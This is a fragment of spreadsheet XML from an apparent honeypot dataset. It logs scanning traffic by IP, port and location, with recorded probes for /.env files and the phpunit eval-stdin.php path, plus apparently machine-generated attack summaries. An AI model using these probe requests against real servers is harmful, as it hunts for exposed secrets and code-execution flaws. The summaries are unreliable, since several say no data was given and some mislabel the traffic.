    <t>SMA-LAB_POP3_H13&amp;&amp;SMA-LAB_REDIS_H36&amp;&amp;SMA-LAB_ORACLE_H18&amp;&amp;SMA-LAB_PJL_H29&amp;&amp;SMA-LAB_REDIS_H38&amp;&amp;SMA-LAB_REDIS_HC1&amp;&amp;SMA-LAB_MSSQL_H45&amp;&amp;SMA-LAB_REDIS_H27&amp;&amp;SMA-LAB_SIP_H34&amp;&amp;SMA-LAB_POP3_H6&amp;&amp;SMA-LAB_FTP_H32&amp;&amp;SMA-LAB_PJL_H27&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_LDAP_H31&amp;&amp;SMA-LAB_REDIS_H8&amp;&amp;SMA-LAB_SMB_H3&amp;&amp;SMA-LAB_SIP_H10&amp;&amp;SMA-LAB_REDIS_H7&amp;&amp;SMA-LAB_PJL_H46&amp;&amp;SMA-LAB_REDIS_H17&amp;&amp;SMA-LAB_REDIS_H31&amp;&amp;SMA-LAB_RDP_H34&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_IMAP_H18&amp;&amp;SMA-LAB_REDIS_H5&amp;&amp;SMA-LAB_REDIS_H15&amp;&amp;SMA-LAB_POSTGRES_H13&amp;&amp;SMA-LAB_POSTGRES_H41&amp;&amp;SMA-LAB_REDIS_H4&amp;&amp;SMA-LAB_REDIS_H11&amp;&amp;SMA-LAB_FTP_H23</t>
  </si>
  <si>
    <t>110&amp;&amp;6379&amp;&amp;1521&amp;&amp;9100&amp;&amp;1433&amp;&amp;NA&amp;&amp;389&amp;&amp;445&amp;&amp;3389&amp;&amp;47983&amp;&amp;5432&amp;&amp;1080&amp;&amp;143&amp;&amp;21&amp;&amp;3306&amp;&amp;443&amp;&amp;80&amp;&amp;37041&amp;&amp;25&amp;&amp;5900</t>
  </si>
  <si>
    <t>command&amp;&amp;connection&amp;&amp;query&amp;&amp;request&amp;&amp;GET&amp;&amp;NA&amp;&amp;login</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'QUIT'}}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'HELP'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'SYST'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'FEAT'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 194.233.76.135:9100_x000D_
User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)_x000D_
Connection: close_x000D_
Accept: */*_x000D_
Accept-Encoding: gzip_x000D_
_x000D_
'}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '194.4.48.242', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'bhjgdwkf', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'sip:185.247.137.105;tag=bhjgdwkf', 'max-forwards': '0', 'to': 'sip:109.123.229.33', 'via': 'SIP/2.0/UDP 185.247.137.105:5060;branch=z9hG4bKbhjgdwkf;received=185.247.137.105;rport=48010'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 38.54.116.162:9100_x000D_
User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)_x000D_
Connection: close_x000D_
Accept: */*_x000D_
Accept-Encoding: gzip_x000D_
_x000D_
'}}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'QUIT'}}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '94.131.113.33', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'ihxlrqwm', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'sip:185.247.137.105;tag=ihxlrqwm', 'max-forwards': '0', 'to': 'sip:185.74.222.213', 'via': 'SIP/2.0/UDP 185.247.137.105:5060;branch=z9hG4bKihxlrqwm;received=185.247.137.105;rport=49016'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_SMTP:{'arg': '/', 'command': 'GET', 'data': 'HTTP/1.1'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'jmpsdguz', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'sip:185.247.137.105;tag=jmpsdguz', 'max-forwards': '0', 'to': 'sip:194.4.48.242', 'via': 'SIP/2.0/UDP 185.247.137.105:5060;branch=z9hG4bKjmpsdguz;received=185.247.137.105;rport=54824'}}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.250.150.39', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 194.233.76.135:9100_x000D_
User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)_x000D_
Connection: close_x000D_
Accept: */*_x000D_
Accept-Encoding: gzip_x000D_
_x000D_
'}}</t>
  </si>
  <si>
    <t>::ffff:b9f7:8969</t>
  </si>
  <si>
    <t>No log data provided, cannot analyze. &amp;&amp; No activity detected against LDAP service, possibly legitimate access or service down. 
 No malicious activity found for this specific log entry. 
 Service check indicates normal operation. &amp;&amp; The data indicates that there was an attempt to access a POP3 service, which is a common target for malicious activity such as spamming or identity theft via unauthorized email account access. This could be a reconnaissance step by attackers before attempting more advanced attacks on the system. The lack of authentication suggests a brute-force attack may have been attempted. &amp;&amp; No log data provided, therefore no analysis can be made.</t>
  </si>
  <si>
    <t>ae404cadfc818d82233f961f3a391922</t>
  </si>
  <si>
    <t>218.161.9.237</t>
  </si>
  <si>
    <t>NA&amp;&amp;218-161-9-237.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_REDIS_H10&amp;&amp;SMA-LAB_IRC_H21&amp;&amp;SMA-LAB_HTTPS_H6&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_LDAP_H42&amp;&amp;SMA-LAB_MT-CPA_H37&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H7</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;36161&amp;&amp;23&amp;&amp;6379&amp;&amp;6667&amp;&amp;443&amp;&amp;23&amp;&amp;389&amp;&amp;14530&amp;&amp;NA</t>
  </si>
  <si>
    <t>Neihu District</t>
  </si>
  <si>
    <t>1671467</t>
  </si>
  <si>
    <t>25.0689</t>
  </si>
  <si>
    <t>121.591</t>
  </si>
  <si>
    <t>::ffff:daa1:9ed</t>
  </si>
  <si>
    <t>No log data provided, unable to analyze or describe any activity. &amp;&amp; No log data provided, cannot analyze.</t>
  </si>
  <si>
    <t>699ff07ca9e033a9a0f50135182127ab</t>
  </si>
  <si>
    <t>45.156.128.56</t>
  </si>
  <si>
    <t>NA&amp;&amp;sh-ams-nl-gp1-wk112a.internet-census.org</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_REDIS_H26&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_POSTGRES_H27&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_REDIS_H30&amp;&amp;SMA-LAB_SMB_H22&amp;&amp;SMA-LAB_PJL_H24&amp;&amp;SMA-LAB_SNMP_H24&amp;&amp;SMA-LAB_RDP_H20&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_POSTGRES_H28&amp;&amp;SMA-LAB_MYSQL_H4&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_PJL_H31&amp;&amp;SMA-LAB_IRC_H40&amp;&amp;SMA-LAB_LDAP_H47&amp;&amp;SMA-LAB_LDAP_H44&amp;&amp;SMA-LAB_IMAP_H6&amp;&amp;SMA-LAB_POP3_H22&amp;&amp;SMA-LAB_POSTGRES_H32&amp;&amp;SMA-LAB_HTTPS_H15&amp;&amp;SMA-LAB_ORACLE_H24&amp;&amp;SMA-LAB_ORACLE_H10&amp;&amp;SMA-LAB_ORACLE_H14&amp;&amp;SMA-LAB_ORACLE_H46&amp;&amp;SMA-LAB_REDIS_H37&amp;&amp;SMA-LAB_ORACLE_H6&amp;&amp;SMA-LAB_LDAP_H15&amp;&amp;SMA-LAB_FTP_H26&amp;&amp;SMA-LAB_ORACLE_H16&amp;&amp;SMA-LAB_LDAP_HC1&amp;&amp;SMA-LAB_LDAP_H24&amp;&amp;SMA-LAB_PJL_H18&amp;&amp;SMA-LAB_ORACLE_H7&amp;&amp;SMA-LAB_POSTGRES_H5&amp;&amp;SMA-LAB_LDAP_H39&amp;&amp;SMA-LAB_POSTGRES_H30&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_LDAP_H7&amp;&amp;SMA-LAB_HTTPS_H8&amp;&amp;SMA-LAB_IRC_H16</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;6379&amp;&amp;23&amp;&amp;5432&amp;&amp;445&amp;&amp;9100&amp;&amp;161&amp;&amp;3389&amp;&amp;3306&amp;&amp;6667&amp;&amp;143&amp;&amp;110&amp;&amp;443&amp;&amp;1521&amp;&amp;38516&amp;&amp;NA&amp;&amp;21&amp;&amp;389&amp;&amp;54921&amp;&amp;22874</t>
  </si>
  <si>
    <t>connection&amp;&amp;login&amp;&amp;command&amp;&amp;request&amp;&amp;query&amp;&amp;NA&amp;&amp;stshash</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'OELP0'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'IEJP0'}}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=45.156.128.56;rport=41717'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'JNIF0'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'MLLG0'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'GENG0'}}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000D_
@PJL INFO ID_x000D_
@PJL INFO PRODINFO_x000D_
'}}&amp;&amp;{Data_SNMP:{'community': 'UnKnown', 'oids': 'UnKnown', 'version': 'UnKnown'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1 _x000D_
_x000D_
'}}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'JGKO0'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=root'}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1 _x000D_
_x000D_
'}}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (guest,)}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'HOPB0'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 38.54.116.162:9100_x000D_
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36 _x000D_
Accept: */*_x000D_
Accept-Encoding: gzip_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000D_
@PJL INFO ID_x000D_
@PJL INFO PRODINFO_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'SSH-2.0-Go_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1 _x000D_
_x000D_
'}}</t>
  </si>
  <si>
    <t>::ffff:2d9c:8038</t>
  </si>
  <si>
    <t>No information is available to analyze. &amp;&amp; Unsuccessful attempt to access PostgreSQL database service, likely due to incorrect login credentials or an exploit scan. The lack of 'Data' indicates no successful interaction with the database service. This activity suggests reconnaissance or a brute-force attack. &amp;&amp; There is insufficient log data provided to analyze any possible malicious activity. &amp;&amp; No available log data provided.</t>
  </si>
  <si>
    <t>I need log data to analyze the attacks. Please provide the log data, and I'll identify the types of attacks. 
(If you're providing it now, please go ahead, and I'll proceed with analysis.)</t>
  </si>
  <si>
    <t>1fd5e3f2c967d339a635f7ccdea09bd9</t>
  </si>
  <si>
    <t>176.65.134.18</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Session Manipulation&amp;&amp;Credential Stuffing&amp;&amp;Email Spoofing</t>
  </si>
  <si>
    <t>SMA-LAB_SMTP_H8&amp;&amp;SMA-LAB_SMTP_HC1&amp;&amp;SMA-LAB_SMTP_H2&amp;&amp;SMA-LAB_HTTPS_H7&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_HTTP_H11</t>
  </si>
  <si>
    <t>25&amp;&amp;443&amp;&amp;80&amp;&amp;NA&amp;&amp;47264</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail']</t>
  </si>
  <si>
    <t>LT</t>
  </si>
  <si>
    <t>Lithuania</t>
  </si>
  <si>
    <t>VL</t>
  </si>
  <si>
    <t>Vilnius</t>
  </si>
  <si>
    <t>Vilnius City Municipality</t>
  </si>
  <si>
    <t>593116</t>
  </si>
  <si>
    <t>01001</t>
  </si>
  <si>
    <t>54.6872</t>
  </si>
  <si>
    <t>25.2797</t>
  </si>
  <si>
    <t>215240</t>
  </si>
  <si>
    <t>Silent Connection Ltd.</t>
  </si>
  <si>
    <t>Silent Connection Ltd</t>
  </si>
  <si>
    <t>connection&amp;&amp;GET&amp;&amp;POST&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'RSET', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'LOGIN', 'command': 'AUTH', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'QUIT', 'data': 'None'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '194.233.76.135', 'User-Agent': 'Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30', 'method': 'GET', 'uri': '/.env'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Content-Length': '19', 'Host': '194.233.76.135', 'User-Agent': 'python-requests/2.25.1', 'method': 'GET', 'uri': '/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36', 'method': 'GET', 'uri': '/.env'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Content-Length': '20', 'Content-Type': 'application/x-www-form-urlencoded', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36', 'method': 'POST', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '193.57.136.113', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36', 'method': 'GET', 'uri': '/.env'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Content-Length': '20', 'Content-Type': 'application/x-www-form-urlencoded', 'Host': '193.57.136.113', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36', 'method': 'POST', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '149.102.153.168', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36', 'method': 'GET', 'uri': '/.env'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Content-Length': '20', 'Content-Type': 'application/x-www-form-urlencoded', 'Host': '149.102.153.168', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36', 'method': 'POST', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Content-Length': '20', 'Content-Type': 'application/x-www-form-urlencoded', 'Host': '149.102.153.168', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36', 'method': 'POST', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36', 'method': 'GET', 'uri': '/.env'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Content-Length': '20', 'Content-Type': 'application/x-www-form-urlencoded', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36', 'method': 'POST', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '194.233.76.135', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36', 'method': 'GET', 'uri': '/.env'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Content-Length': '20', 'Content-Type': 'application/x-www-form-urlencoded', 'Host': '194.233.76.135', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36', 'method': 'POST', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36', 'method': 'GET', 'uri': '/.env'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Content-Length': '20', 'Content-Type': 'application/x-www-form-urlencoded', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36', 'method': 'POST', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Content-Length': '20', 'Content-Type': 'application/x-www-form-urlencoded', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36', 'method': 'POST', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '109.123.229.33', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36', 'method': 'GET', 'uri': '/.env'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Content-Length': '20', 'Content-Type': 'application/x-www-form-urlencoded', 'Host': '109.123.229.33', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36', 'method': 'POST', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '144.126.148.5', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36', 'method': 'GET', 'uri': '/.env'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Content-Length': '20', 'Content-Type': 'application/x-www-form-urlencoded', 'Host': '144.126.148.5', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36', 'method': 'POST', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36', 'method': 'GET', 'uri': '/.env'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '154.93.37.45', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36', 'method': 'GET', 'uri': '/.env'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Content-Length': '20', 'Content-Type': 'application/x-www-form-urlencoded', 'Host': '154.93.37.45', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36', 'method': 'POST', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Content-Length': '20', 'Content-Type': 'application/x-www-form-urlencoded', 'Host': '154.93.37.45', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36', 'method': 'POST', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:b041:8612</t>
  </si>
  <si>
    <t>The attackers are attempting to gather information about the system, such as its IP address, user names, and potential vulnerabilities. They are also trying to gain access to various services, including databases, file transfer protocols, and email servers.</t>
  </si>
  <si>
    <t>SMB Relay Attack</t>
  </si>
  <si>
    <t>7a37899112262023b54086d5de9bcaab</t>
  </si>
  <si>
    <t>121.134.145.252</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H39&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>62284&amp;&amp;23&amp;&amp;49971&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:7986:91fc</t>
  </si>
  <si>
    <t>No available log data provided for analysis.</t>
  </si>
  <si>
    <t>I'll need some log data to analyze, but I can give you some common types of attacks that may be seen in a honeypot's logs:
*   Brute Force
*   SQLi
*   Phishing
*   RootKit
*   DoS
*   DDoS</t>
  </si>
  <si>
    <t>ff4b862189b04bfc74fcca7b0ac85898</t>
  </si>
  <si>
    <t>183.99.12.101</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_MT-CPA_H37&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;31643&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:b763:c65</t>
  </si>
  <si>
    <t>No Telnet activity detected, which is unusual since Telnet services are typically exposed to the internet for remote access.
This could be an indication of an attacker attempting to exploit known vulnerabilities in Telnet servers.
The lack of activity may also suggest the service is not reachable or configured incorrectly.</t>
  </si>
  <si>
    <t>Brute Scan</t>
  </si>
  <si>
    <t>cfa9f3c5d021e55fb051d69d224f245d</t>
  </si>
  <si>
    <t>185.247.137.227</t>
  </si>
  <si>
    <t>NA&amp;&amp;uplifting.monitoring.internet-measurement.com</t>
  </si>
  <si>
    <t>Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Encryption Misuse&amp;&amp;Suspicious Web Activity Detected</t>
  </si>
  <si>
